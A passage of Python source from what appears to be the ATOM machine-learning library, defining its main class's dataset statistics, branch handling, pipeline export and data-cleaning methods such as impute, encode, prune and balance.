value for value in classes}\r\n\r\n self.log('', 1) # Add empty rows around stats for cleaner look\r\n self.stats(1)\r\n self.log('', 1)\r\n\r\n def __repr__(self):\r\n out = f\"{self.__class__.__name__}\"\r\n out += f\"\\n --> Branches:\"\r\n if len(self._branches) - 1 == 1:\r\n out += f\" {self._current}\"\r\n else:\r\n for branch in [b for b in self._branches if b != \"og\"]:\r\n out += f\"\\n >>> {branch}{' !' 
if branch == self._current else ''}\"\r\n out += f\"\\n --> Models: {', '.join(lst(self.models)) if self.models else None}\"\r\n out += f\"\\n --> Metric: {', '.join(lst(self.metric)) if self.metric else None}\"\r\n out += f\"\\n --> Errors: {len(self.errors)}\"\r\n\r\n return out\r\n\r\n def __len__(self):\r\n return len(self.pipeline)\r\n\r\n def __iter__(self):\r\n yield from self.pipeline.values\r\n\r\n def __contains__(self, item):\r\n return item in self.dataset\r\n\r\n def __getitem__(self, item):\r\n if isinstance(item, int):\r\n return self.pipeline.iloc[item] # Transformer from pipeline\r\n elif isinstance(item, str):\r\n return self.dataset[item] # Column from dataset\r\n else:\r\n raise TypeError(\r\n f\"'{self.__class__.__name__}' object is only\"\r\n \" subscriptable with types int or str.\"\r\n )\r\n\r\n # Utility properties =========================================== >>\r\n\r\n @BasePredictor.branch.setter\r\n @typechecked\r\n def branch(self, branch: str):\r\n if not branch:\r\n raise ValueError(\"Can't create a branch with an empty name!\")\r\n elif branch.lower() == \"og\":\r\n raise ValueError(\r\n \"This name is reserved for internal purposes. \"\r\n \"Choose a different name for the branch.\"\r\n )\r\n elif branch.lower() in self._branches:\r\n self._current = branch.lower()\r\n self.log(f\"Switched to branch {branch}.\", 1)\r\n else:\r\n # Branch can be created from current or another\r\n if \"_from_\" in branch:\r\n new_branch, from_branch = branch.lower().split(\"_from_\")\r\n else:\r\n new_branch, from_branch = branch.lower(), self._current\r\n\r\n if from_branch not in self._branches:\r\n raise ValueError(\r\n \"The selected branch to split from does not exist! Print \"\r\n \"atom.branch for an overview of the available branches.\"\r\n )\r\n\r\n self._branches[new_branch] = Branch(self, new_branch, parent=from_branch)\r\n self._current = new_branch\r\n self.log(f\"New branch {self._current} successfully created!\", 1)\r\n\r\n @property\r\n def scaled(self):\r\n \"\"\"Whether the feature set is scaled.\"\"\"\r\n if not check_multidimensional(self.X):\r\n est_names = [est.__class__.__name__.lower() for est in self.pipeline]\r\n return check_scaling(self.X) or \"scaler\" in est_names\r\n\r\n @property\r\n def duplicates(self):\r\n \"\"\"Number of duplicate rows in the dataset.\"\"\"\r\n if not check_multidimensional(self.X):\r\n return self.dataset.duplicated().sum()\r\n\r\n @property\r\n def nans(self):\r\n \"\"\"Columns with the number of missing values in them.\"\"\"\r\n if not check_multidimensional(self.X):\r\n nans = self.dataset.replace(self.missing + [np.inf, -np.inf], np.NaN)\r\n nans = nans.isna().sum()\r\n return nans[nans > 0]\r\n\r\n @property\r\n def n_nans(self):\r\n \"\"\"Number of samples containing missing values.\"\"\"\r\n if not check_multidimensional(self.X):\r\n nans = self.dataset.replace(self.missing + [np.inf, -np.inf], np.NaN)\r\n nans = nans.isna().sum(axis=1)\r\n return len(nans[nans > 0])\r\n\r\n @property\r\n def numerical(self):\r\n \"\"\"Names of the numerical features in the dataset.\"\"\"\r\n if not check_multidimensional(self.X):\r\n return list(self.X.select_dtypes(include=[\"number\"]).columns)\r\n\r\n @property\r\n def n_numerical(self):\r\n \"\"\"Number of numerical features in the dataset.\"\"\"\r\n if not check_multidimensional(self.X):\r\n return len(self.numerical)\r\n\r\n @property\r\n def categorical(self):\r\n \"\"\"Names of the categorical features in the dataset.\"\"\"\r\n if not check_multidimensional(self.X):\r\n 
return list(self.X.select_dtypes(exclude=[\"number\"]).columns)\r\n\r\n @property\r\n def n_categorical(self):\r\n \"\"\"Number of categorical features in the dataset.\"\"\"\r\n if not check_multidimensional(self.X):\r\n return len(self.categorical)\r\n\r\n @property\r\n def outliers(self):\r\n \"\"\"Columns in training set with amount of outlier values.\"\"\"\r\n if not check_multidimensional(self.X):\r\n num_and_target = self.dataset.select_dtypes(include=[\"number\"]).columns\r\n z_scores = stats.zscore(self.train[num_and_target], nan_policy=\"propagate\")\r\n srs = pd.Series((np.abs(z_scores) > 3).sum(axis=0), index=num_and_target)\r\n return srs[srs > 0]\r\n\r\n @property\r\n def n_outliers(self):\r\n \"\"\"Number of samples in the training set containing outliers.\"\"\"\r\n if not check_multidimensional(self.X):\r\n num_and_target = self.dataset.select_dtypes(include=[\"number\"]).columns\r\n z_scores = stats.zscore(self.train[num_and_target], nan_policy=\"propagate\")\r\n return len(np.where((np.abs(z_scores) > 3).any(axis=1))[0])\r\n\r\n @property\r\n def classes(self):\r\n \"\"\"Distribution of target classes per data set.\"\"\"\r\n return pd.DataFrame(\r\n {\r\n \"dataset\": self.y.value_counts(sort=False, dropna=False),\r\n \"train\": self.y_train.value_counts(sort=False, dropna=False),\r\n \"test\": self.y_test.value_counts(sort=False, dropna=False),\r\n },\r\n index=self.mapping.values(),\r\n ).fillna(0).astype(int) # If 0 counts, it doesnt return the row (gets a NaN)\r\n\r\n @property\r\n def n_classes(self):\r\n \"\"\"Number of classes in the target column.\"\"\"\r\n return len(self.y.unique())\r\n\r\n # Utility methods =============================================== >>\r\n\r\n @composed(crash, method_to_log)\r\n def status(self):\r\n \"\"\"Get an overview of atom's status.\"\"\"\r\n self.log(str(self))\r\n\r\n @composed(crash, method_to_log)\r\n def reset(self):\r\n \"\"\"Reset the instance to it's initial state.\r\n\r\n Deletes all branches and models. The dataset is also reset\r\n to its form after initialization.\r\n\r\n \"\"\"\r\n # Delete all models and branches\r\n delete(self, self._get_models(None))\r\n for name in [b for b in self._branches if b != \"og\"]:\r\n self._branches.pop(name)\r\n\r\n # Re-create the master branch from original\r\n self._branches[\"master\"] = Branch(self, \"master\", parent=\"og\")\r\n self._current = \"master\"\r\n\r\n self.log(\"The instance is successfully reset!\", 1)\r\n\r\n @composed(crash, method_to_log)\r\n def stats(self, _vb: int = -2):\r\n \"\"\"Print basic information about the dataset.\r\n\r\n Parameters\r\n ----------\r\n _vb: int, optional (default=-2)\r\n Internal parameter to always print if called by user.\r\n\r\n \"\"\"\r\n self.log(\"Dataset stats ====================== >>\", _vb)\r\n self.log(f\"Shape: {self.shape}\", _vb)\r\n\r\n if not check_multidimensional(self.X):\r\n nans = self.nans.sum()\r\n n_categorical = self.n_categorical\r\n outliers = self.outliers.sum()\r\n duplicates = self.dataset.duplicated().sum()\r\n\r\n self.log(f\"Scaled: {self.scaled}\", _vb)\r\n if self.nans.sum():\r\n p_nans = round(100. * nans / self.dataset.size, 1)\r\n self.log(f\"Missing values: {nans} ({p_nans}%)\", _vb)\r\n if n_categorical:\r\n p_cat = round(100. * n_categorical / self.n_features, 1)\r\n self.log(f\"Categorical features: {n_categorical} ({p_cat}%)\", _vb)\r\n if outliers:\r\n p_out = round(100. 
* outliers / self.train.size, 1)\r\n self.log(f\"Outlier values: {outliers} ({p_out}%)\", _vb)\r\n if duplicates:\r\n p_dup = round(100. * duplicates / len(self.dataset), 1)\r\n self.log(f\"Duplicate samples: {duplicates} ({p_dup}%)\", _vb)\r\n\r\n self.log(\"---------------------------------------\", _vb)\r\n self.log(f\"Train set size: {len(self.train)}\", _vb)\r\n self.log(f\"Test set size: {len(self.test)}\", _vb)\r\n\r\n # Print count and balance of classes\r\n if self.task != \"regression\":\r\n self.log(\"---------------------------------------\", _vb + 1)\r\n cls = self.classes # Calculate class distribution only once\r\n func = lambda i, col: f\"{i} ({divide(i, min(cls[col])):.1f})\"\r\n df = pd.DataFrame(\r\n {col: [func(v, col) for v in cls[col]] for col in cls},\r\n index=self.mapping.values(),\r\n )\r\n self.log(df.to_markdown(), _vb + 1)\r\n\r\n @composed(crash, typechecked)\r\n def distribution(self, column: Union[int, str] = 0):\r\n \"\"\"Get statistics on a column's distribution.\r\n\r\n Compute the KS-statistic for various distributions against\r\n a column in the dataset.\r\n\r\n Parameters\r\n ----------\r\n column: int or str, optional (default=0)\r\n Index or name of the column to get the statistics from.\r\n Only numerical columns are accepted.\r\n\r\n Returns\r\n -------\r\n df: pd.DataFrame\r\n Dataframe with the statistic results.\r\n\r\n \"\"\"\r\n if isinstance(column, int):\r\n column = self.columns[column]\r\n\r\n if column in self.categorical:\r\n raise ValueError(\r\n \"Invalid value for the column parameter. Column should \"\r\n f\"be numerical, got categorical column {column}.\"\r\n )\r\n\r\n # Drop missing values from the column before fitting\r\n X = self[column].replace(self.missing + [np.inf, -np.inf], np.NaN).dropna()\r\n\r\n df = pd.DataFrame(columns=[\"ks\", \"p_value\"])\r\n for dist in DISTRIBUTIONS:\r\n # Get KS-statistic with fitted distribution parameters\r\n param = getattr(stats, dist).fit(X)\r\n stat = stats.kstest(X, dist, args=param)\r\n\r\n # Add as row to the dataframe\r\n df.loc[dist] = {\"ks\": round(stat[0], 4), \"p_value\": round(stat[1], 4)}\r\n\r\n return df.sort_values([\"ks\"])\r\n\r\n @composed(crash, typechecked)\r\n def report(\r\n self,\r\n dataset: str = \"dataset\",\r\n n_rows: Optional[Union[int, float]] = None, # float for 1e3...\r\n filename: Optional[str] = None,\r\n ):\r\n \"\"\"Create an extensive profile analysis report of the data.\r\n\r\n The profile report is rendered in HTML5 and CSS3. Note that\r\n this method can be slow for n_rows>10k.\r\n\r\n Parameters\r\n ----------\r\n dataset: str, optional (default=\"dataset\")\r\n Data set to get the report from.\r\n\r\n n_rows: int or None, optional (default=None)\r\n Number of (randomly picked) rows in to process. None for\r\n all rows.\r\n\r\n filename: str or None, optional (default=None)\r\n Name to save the file with (as .html). 
None to not save\r\n anything.\r\n\r\n Returns\r\n -------\r\n profile: ProfileReport\r\n Created report object.\r\n\r\n \"\"\"\r\n from pandas_profiling import ProfileReport\r\n\r\n self.log(\"Creating profile report...\", 1)\r\n\r\n n_rows = getattr(self, dataset).shape[0] if n_rows is None else int(n_rows)\r\n profile = ProfileReport(getattr(self, dataset).sample(n_rows))\r\n\r\n if filename:\r\n if not filename.endswith(\".html\"):\r\n filename = filename + \".html\"\r\n profile.to_file(filename)\r\n self.log(\"Report saved successfully!\", 1)\r\n\r\n return profile\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def transform(\r\n self,\r\n X: X_TYPES,\r\n y: Y_TYPES = None,\r\n pipeline: Optional[Union[bool, SEQUENCE_TYPES]] = None,\r\n verbose: Optional[int] = None,\r\n ):\r\n \"\"\"Transform new data through all transformers in the branch.\r\n\r\n By default, transformers that are applied on the training\r\n set only are not used during the transformations. Use the\r\n `pipeline` parameter to customize this behaviour.\r\n\r\n Parameters\r\n ----------\r\n X: dict, list, tuple, np.ndarray or pd.DataFrame\r\n Feature set with shape=(n_samples, n_features).\r\n\r\n y: int, str, sequence or None, optional (default=None)\r\n - If None: y is ignored in the transformers.\r\n - If int: Index of the target column in X.\r\n - If str: Name of the target column in X.\r\n - Else: Target column with shape=(n_samples,).\r\n\r\n Feature set with shape=(n_samples, n_features).\r\n\r\n pipeline: bool, sequence or None, optional (default=None)\r\n Transformers to use on the data before predicting.\r\n - If None: Only transformers that are applied on the\r\n whole dataset are used.\r\n - If False: Don't use any transformers.\r\n - If True: Use all transformers in the pipeline.\r\n - If sequence: Transformers to use, selected by their\r\n index in the pipeline.\r\n\r\n verbose: int or None, optional (default=None)\r\n Verbosity level for the transformers. If None, it uses the\r\n transformer's own verbosity.\r\n\r\n Returns\r\n -------\r\n X: pd.DataFrame\r\n Transformed feature set.\r\n\r\n y: pd.Series\r\n Transformed target column. Only returned if provided.\r\n\r\n \"\"\"\r\n if pipeline is None:\r\n pipeline = [i for i, est in enumerate(self.pipeline) if not est.train_only]\r\n elif pipeline is False:\r\n pipeline = []\r\n elif pipeline is True:\r\n pipeline = list(range(len(self.pipeline)))\r\n\r\n for idx, est in enumerate(self.pipeline):\r\n if idx in pipeline:\r\n X, y = custom_transform(self, est, self.branch, (X, y), verbose)\r\n\r\n return variable_return(X, y)\r\n\r\n def automl(self, **kwargs):\r\n \"\"\"Use AutoML to search for an optimized pipeline.\r\n\r\n Uses the TPOT package to perform an automated search of\r\n transformers and a final estimator that maximizes a metric\r\n on the dataset. The resulting transformations and estimator\r\n are merged with atom's pipeline. 
The tpot instance can be\r\n accessed through the `tpot` attribute.\r\n\r\n Parameters\r\n ----------\r\n **kwargs\r\n Keyword arguments for tpot's classifier/regressor.\r\n\r\n \"\"\"\r\n from tpot import TPOTClassifier, TPOTRegressor\r\n\r\n check_method(self, \"automl\")\r\n # Define the scoring parameter\r\n if self._metric and not kwargs.get(\"scoring\"):\r\n kwargs[\"scoring\"] = self._metric[0]\r\n elif kwargs.get(\"scoring\"):\r\n metric_ = BaseTrainer._prepare_metric([kwargs[\"scoring\"]])\r\n if not self._metric:\r\n self._metric = metric_ # Update the pipeline's metric\r\n elif metric_[0].name != self.metric[0]:\r\n raise ValueError(\r\n \"Invalid value for the scoring parameter! The scoring \"\r\n \"should be equal to the primary metric in the pipeline. \"\r\n f\"Expected {self.metric[0]}, got {metric_[0].name}.\"\r\n )\r\n\r\n kwargs = dict(\r\n n_jobs=kwargs.pop(\"n_jobs\", self.n_jobs),\r\n verbosity=kwargs.pop(\"verbosity\", self.verbose),\r\n random_state=kwargs.pop(\"random_state\", self.random_state),\r\n **kwargs,\r\n )\r\n if self.goal.startswith(\"class\"):\r\n self.branch.tpot = TPOTClassifier(**kwargs)\r\n else:\r\n self.branch.tpot = TPOTRegressor(**kwargs)\r\n\r\n self.log(\"Fitting automl algorithm...\", 1)\r\n\r\n self.tpot.fit(self.X_train, self.y_train)\r\n\r\n self.log(\"\\nMerging automl results with atom...\", 1)\r\n\r\n # A pipeline could consist of just a single estimator\r\n if len(self.tpot.fitted_pipeline_) > 1:\r\n for name, est in self.tpot.fitted_pipeline_[:-1].named_steps.items():\r\n add_transformer(self, est)\r\n\r\n # Add the final estimator as a model to atom\r\n est = self.tpot.fitted_pipeline_[-1]\r\n est.acronym, est.fullname = names_from_estimator(self, est)\r\n model = CustomModel(self, estimator=est)\r\n model.estimator = model.est\r\n\r\n # Save metric scores on complete training and test set\r\n model.metric_train = flt([\r\n metric(model.estimator, self.X_train, self.y_train)\r\n for metric in self._metric\r\n ])\r\n model.metric_test = flt([\r\n metric(model.estimator, self.X_test, self.y_test)\r\n for metric in self._metric\r\n ])\r\n\r\n self._models.update({model.name: model})\r\n self.log(f\"Adding model {model.fullname} ({model.name}) to the pipeline...\", 1)\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def save_data(self, filename: str = \"auto\", dataset: str = \"dataset\"):\r\n \"\"\"Save the data in the current branch to a csv file.\r\n\r\n Parameters\r\n ----------\r\n filename: str, optional (default=\"auto\")\r\n Name of the file. Use \"auto\" for automatic naming.\r\n\r\n dataset: str, optional (default=\"dataset\")\r\n Data set to save.\r\n\r\n \"\"\"\r\n if filename.endswith(\"auto\"):\r\n filename = filename.replace(\"auto\", f\"{self.__class__.__name__}_{dataset}\")\r\n if not filename.endswith(\".csv\"):\r\n filename += \".csv\"\r\n\r\n getattr(self, dataset).to_csv(filename, index=False)\r\n self.log(\"Data set saved successfully!\", 1)\r\n\r\n @composed(crash, typechecked)\r\n def export_pipeline(\r\n self,\r\n model: Optional[str] = None,\r\n pipeline: Optional[Union[bool, SEQUENCE_TYPES]] = None,\r\n verbose: Optional[int] = None,\r\n ):\r\n \"\"\"Export atom's pipeline to a sklearn-like Pipeline object.\r\n\r\n Optionally, you can add a model as final estimator. The\r\n returned pipeline is already fitted on the training set.\r\n\r\n Parameters\r\n ----------\r\n model: str or None, optional (default=None)\r\n Name of the model to add as a final estimator to the\r\n pipeline. 
If the model used feature scaling, the Scaler\r\n is added before the model. If None, only the\r\n transformers are added.\r\n\r\n pipeline: bool, sequence or None, optional (default=None)\r\n Transformers to export.\r\n - If None: Only transformers that are applied on the\r\n whole dataset are exported.\r\n - If False: Don't use any transformers.\r\n - If True: Use all transformers in the pipeline.\r\n - If sequence: Transformers to use, selected by their\r\n index in the pipeline.\r\n\r\n verbose: int or None, optional (default=None)\r\n Verbosity level of the transformers in the pipeline. If\r\n None, it leaves them to their original verbosity.\r\n\r\n Returns\r\n -------\r\n pipeline: Pipeline\r\n Current branch as a sklearn-like Pipeline object.\r\n\r\n \"\"\"\r\n if pipeline is None:\r\n pipeline = [i for i, est in enumerate(self.pipeline) if not est.train_only]\r\n elif pipeline is False:\r\n pipeline = []\r\n elif pipeline is True:\r\n pipeline = list(range(len(self.pipeline)))\r\n\r\n if len(pipeline) == 0 and not model:\r\n raise RuntimeError(\"The selected pipeline seems to be empty!\")\r\n\r\n steps = []\r\n for idx, transformer in enumerate(self.pipeline):\r\n if idx in pipeline:\r\n est = deepcopy(transformer) # Not clone to keep fitted\r\n # Set the new verbosity (if possible)\r\n if verbose is not None and hasattr(est, \"verbose\"):\r\n est.verbose = verbose\r\n\r\n steps.append((est.__class__.__name__.lower(), est))\r\n\r\n if model:\r\n model = getattr(self, self._get_model_name(model)[0])\r\n if model.scaler:\r\n steps.append((\"scaler\", deepcopy(model.scaler)))\r\n\r\n # Redirect stdout to avoid annoying prints\r\n with open(os.devnull, \"w\") as f, contextlib.redirect_stdout(f):\r\n steps.append((model.name, deepcopy(model.estimator)))\r\n\r\n return Pipeline(steps) # ATOM's pipeline, not sklearn\r\n\r\n # Base transformers ============================================ >>\r\n\r\n def _prepare_kwargs(self, kwargs, params=None):\r\n \"\"\"Return kwargs with atom's values if not specified.\"\"\"\r\n for attr in BaseTransformer.attrs:\r\n if (not params or attr in params) and attr not in kwargs:\r\n kwargs[attr] = getattr(self, attr)\r\n\r\n return kwargs\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def drop(self, columns: Union[int, str, slice, SEQUENCE_TYPES], **kwargs):\r\n \"\"\"Drop columns from the dataset.\r\n\r\n This approach is preferred over dropping columns from the\r\n dataset directly through the property's `@setter` since\r\n the transformation is saved to atom's pipeline.\r\n\r\n Parameters\r\n ----------\r\n columns: int, str, slice or sequence\r\n Names or indices of the columns to drop.\r\n\r\n \"\"\"\r\n check_method(self, \"drop\")\r\n columns = self._get_columns(columns)\r\n if self.target in columns:\r\n raise ValueError(\r\n \"Invalid value for the columns parameter. \"\r\n \"The target column can not be dropped.\"\r\n )\r\n\r\n kwargs = self._prepare_kwargs(kwargs, [\"verbose\", \"logger\"])\r\n transformer = DropTransformer(columns=columns, **kwargs)\r\n custom_transform(self, transformer, self.branch)\r\n\r\n self.branch.pipeline = self.pipeline.append(\r\n pd.Series([transformer], name=self._current), ignore_index=True\r\n )\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def apply(\r\n self,\r\n func: callable,\r\n column: Union[int, str],\r\n args=(),\r\n **kwargs\r\n ):\r\n \"\"\"Apply a function to the dataset.\r\n\r\n Transform one column in the dataset using a function (can\r\n be a lambda). 
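\r\n\r\n        A minimal sketch (the column names are hypothetical):\r\n\r\n            atom.apply(lambda df: df[\"weight\"] / df[\"height\"] ** 2, column=\"bmi\")\r\n\r\n        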
If the provided column is present in the dataset,\r\n that same column is transformed. If it's not a column in the\r\n dataset, a new column with that name is created. The first\r\n parameter of the function is the complete dataset.\r\n\r\n This approach is preferred over changing the dataset directly\r\n through the property's `@setter` since the transformation\r\n is saved to atom's pipeline.\r\n\r\n Parameters\r\n ----------\r\n func: function\r\n Function to apply to the dataset.\r\n\r\n column: int or str\r\n Name or index of the column in the dataset to create\r\n or transform.\r\n\r\n args: tuple, optional (default=())\r\n Positional arguments passed to func after the dataset.\r\n\r\n **kwargs\r\n Additional keyword arguments passed to func.\r\n\r\n \"\"\"\r\n check_method(self, \"apply\")\r\n if not callable(func):\r\n raise TypeError(\r\n \"Invalid value for the func parameter. Argument is not callable!\"\r\n )\r\n\r\n if isinstance(column, int):\r\n column = self._get_columns(column)[0]\r\n\r\n kwargs = self._prepare_kwargs(kwargs, [\"verbose\", \"logger\"])\r\n transformer = FuncTransformer(func, column=column, args=args, **kwargs)\r\n custom_transform(self, transformer, self.branch)\r\n\r\n self.branch.pipeline = self.pipeline.append(\r\n pd.Series([transformer], name=self._current), ignore_index=True\r\n )\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def add(\r\n self,\r\n transformer: Any,\r\n columns: Optional[Union[int, str, slice, SEQUENCE_TYPES]] = None,\r\n train_only: bool = False,\r\n **fit_params,\r\n ):\r\n \"\"\"Add a transformer to the current branch.\r\n\r\n If the transformer is not fitted, it is fitted on the complete\r\n training set. Afterwards, the data set is transformed and the\r\n transformer is added to atom's pipeline. If the transformer is\r\n a sklearn Pipeline, every transformer is merged independently\r\n with atom.\r\n\r\n If the transformer has a `n_jobs` and/or `random_state` parameter\r\n that is left to its default value, it adopts atom's value.\r\n\r\n Parameters\r\n ----------\r\n transformer: estimator\r\n Transformer to add to the pipeline. Should implement a\r\n `transform` method.\r\n\r\n columns: int, str, slice, sequence or None, optional (default=None)\r\n Names or indices of the columns in the dataset to transform.\r\n If None, transform all columns.\r\n\r\n train_only: bool, optional (default=False)\r\n Whether to apply the transformer only on the training set or\r\n on the complete dataset.\r\n\r\n **fit_params\r\n Additional keyword arguments passed to the transformer's fit\r\n method.\r\n\r\n \"\"\"\r\n check_method(self, \"add\")\r\n if transformer.__class__.__name__ == \"Pipeline\":\r\n # Recursively add all transformers to the pipeline\r\n for name, est in transformer.named_steps.items():\r\n add_transformer(self, est, columns, train_only, **fit_params)\r\n\r\n else:\r\n add_transformer(self, transformer, columns, train_only, **fit_params)\r\n\r\n # Data cleaning transformers =================================== >>\r\n\r\n @composed(crash, method_to_log)\r\n def scale(self, strategy: str = \"standard\", **kwargs):\r\n \"\"\"Scale the data.\r\n\r\n Apply one of sklearn's scalers. 
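\r\n\r\n        For example, assuming \"minmax\" is among the supported strategy\r\n        names:\r\n\r\n            atom.scale(strategy=\"minmax\")\r\n\r\n        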
Categorical columns are ignored.\r\n The estimator created by the class is attached to atom.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"scale\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Scaler().get_params())\r\n scaler = Scaler(strategy=strategy, **kwargs)\r\n\r\n add_transformer(self, scaler, columns=columns)\r\n\r\n # Attach the estimator attribute to atom's branch\r\n setattr(self.branch, strategy.lower(), getattr(scaler, strategy.lower()))\r\n\r\n @composed(crash, method_to_log)\r\n def gauss(self, strategy: str = \"yeo-johnson\", **kwargs):\r\n \"\"\"Transform the data to follow a Gaussian distribution.\r\n\r\n This transformation is useful for modeling issues related\r\n to heteroscedasticity (non-constant variance), or other\r\n situations where normality is desired. Missing values are\r\n disregarded in fit and maintained in transform. Categorical\r\n columns are ignored. The estimator created by the class is\r\n attached to atom.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"gauss\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Gauss().get_params())\r\n gauss = Gauss(strategy=strategy, **kwargs)\r\n\r\n add_transformer(self, gauss, columns=columns)\r\n\r\n # Attach the estimator attribute to atom's branch\r\n for attr in (\"yeojohnson\", \"boxcox\", \"quantile\"):\r\n if hasattr(gauss, attr):\r\n setattr(self.branch, attr, getattr(gauss, attr))\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def clean(\r\n self,\r\n drop_types: Optional[Union[str, SEQUENCE_TYPES]] = None,\r\n strip_categorical: bool = True,\r\n drop_max_cardinality: bool = True,\r\n drop_min_cardinality: bool = True,\r\n drop_duplicates: bool = False,\r\n drop_missing_target: bool = True,\r\n encode_target: bool = True,\r\n **kwargs,\r\n ):\r\n \"\"\"Applies standard data cleaning steps on the dataset.\r\n\r\n Use the parameters to choose which transformations to perform.\r\n The available steps are:\r\n - Drop columns with specific data types.\r\n - Strip categorical features from white spaces.\r\n - Drop categorical columns with maximal cardinality.\r\n - Drop columns with minimum cardinality.\r\n - Drop duplicate rows.\r\n - Drop rows with missing values in the target column.\r\n - Encode the target column.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"clean\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Cleaner().get_params())\r\n cleaner = Cleaner(\r\n drop_types=drop_types,\r\n strip_categorical=strip_categorical,\r\n drop_max_cardinality=drop_max_cardinality,\r\n drop_min_cardinality=drop_min_cardinality,\r\n drop_duplicates=drop_duplicates,\r\n drop_missing_target=drop_missing_target,\r\n encode_target=encode_target,\r\n **kwargs,\r\n )\r\n # Pass atom's missing values to the cleaner before transforming\r\n cleaner.missing = self.missing\r\n\r\n add_transformer(self, cleaner, columns=columns)\r\n\r\n # Assign mapping (if it changed)\r\n if cleaner.mapping:\r\n self.branch.mapping = cleaner.mapping\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def impute(\r\n self,\r\n strat_num: Union[int, float, str] = \"drop\",\r\n strat_cat: str = \"drop\",\r\n min_frac_rows: Optional[float] = None,\r\n min_frac_cols: Optional[float] = None,\r\n **kwargs,\r\n ):\r\n \"\"\"Handle missing values 
in the dataset.\r\n\r\n Impute or remove missing values according to the selected strategy.\r\n Also removes rows and columns with too many missing values. Use\r\n the `missing` attribute to customize what are considered \"missing\r\n values\".\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"impute\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Imputer().get_params())\r\n imputer = Imputer(\r\n strat_num=strat_num,\r\n strat_cat=strat_cat,\r\n min_frac_rows=min_frac_rows,\r\n min_frac_cols=min_frac_cols,\r\n **kwargs,\r\n )\r\n # Pass atom's missing values to the imputer before transforming\r\n imputer.missing = self.missing\r\n\r\n add_transformer(self, imputer, columns=columns)\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def encode(\r\n self,\r\n strategy: str = \"LeaveOneOut\",\r\n max_onehot: Optional[int] = 10,\r\n frac_to_other: Optional[float] = None,\r\n **kwargs,\r\n ):\r\n \"\"\"Perform encoding of categorical features.\r\n\r\n The encoding type depends on the number of classes in the\r\n column:\r\n - If n_classes=2, use Ordinal-encoding.\r\n - If 2 < n_classes <= `max_onehot`, use OneHot-encoding.\r\n - If n_classes > `max_onehot`, use `strategy`-encoding.\r\n\r\n Also replaces classes with low occurrences with the value\r\n `other` in order to prevent too high cardinality. An error is\r\n raised if it encounters missing values or unknown classes when\r\n transforming.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"encode\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Encoder().get_params())\r\n encoder = Encoder(\r\n strategy=strategy,\r\n max_onehot=max_onehot,\r\n frac_to_other=frac_to_other,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, encoder, columns=columns)\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def prune(\r\n self,\r\n strategy: Union[str, SEQUENCE_TYPES] = \"z-score\",\r\n method: Union[int, float, str] = \"drop\",\r\n max_sigma: Union[int, float] = 3,\r\n include_target: bool = False,\r\n **kwargs,\r\n ):\r\n \"\"\"Prune outliers from the training set.\r\n\r\n Replace or remove outliers. The definition of outlier depends\r\n on the selected strategy and can greatly differ from one\r\n another. Only outliers from the training set are pruned in\r\n order to maintain the original distribution of samples in\r\n the test set. Ignores categorical columns. 
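\r\n\r\n        For example, a stricter cut-off with the default strategy:\r\n\r\n            atom.prune(strategy=\"z-score\", max_sigma=2)\r\n\r\n        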
The estimators\r\n created by the class are attached to atom.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"prune\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Pruner().get_params())\r\n pruner = Pruner(\r\n strategy=strategy,\r\n method=method,\r\n max_sigma=max_sigma,\r\n include_target=include_target,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, pruner, columns=columns, train_only=True)\r\n\r\n # Attach the estimator attribute to atom's branch\r\n for strat in lst(strategy):\r\n if strat.lower() != \"z-score\":\r\n setattr(self.branch, strat.lower(), getattr(pruner, strat.lower()))\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def balance(self, strategy: str = \"ADASYN\", **kwargs):\r\n \"\"\"Balance the number of rows per class in the target column.\r\n\r\n Only the training set is balanced in order to maintain the\r\n original distribution of target classes in the test set.\r\n Use only for classification tasks. The estimator created by\r\n the class is attached to atom.\r\n\r\n See data_cleaning.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"balance\")\r\n if not self.goal.startswith(\"class\"):\r\n raise PermissionError(\r\n \"The balance method is only available for classification tasks!\"\r\n )\r\n\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, Balancer().get_params())\r\n balancer = Balancer(strategy=strategy, **kwargs)\r\n\r\n # Add mapping from atom to balancer for cleaner printing\r\n balancer.mapping = self.mapping\r\n\r\n add_transformer(self, balancer, columns=columns, train_only=True)\r\n\r\n # Attach the estimator attribute to atom's branch\r\n setattr(self.branch, strategy.lower(), getattr(balancer, strategy.lower()))\r\n\r\n # NLP transformers ============================================= >>\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def textclean(\r\n self,\r\n decode: bool = True,\r\n lower_case: bool = True,\r\n drop_email: bool = True,\r\n regex_email: Optional[str] = None,\r\n drop_url: bool = True,\r\n regex_url: Optional[str] = None,\r\n drop_html: bool = True,\r\n regex_html: Optional[str] = None,\r\n drop_emoji: bool = True,\r\n regex_emoji: Optional[str] = None,\r\n drop_number: 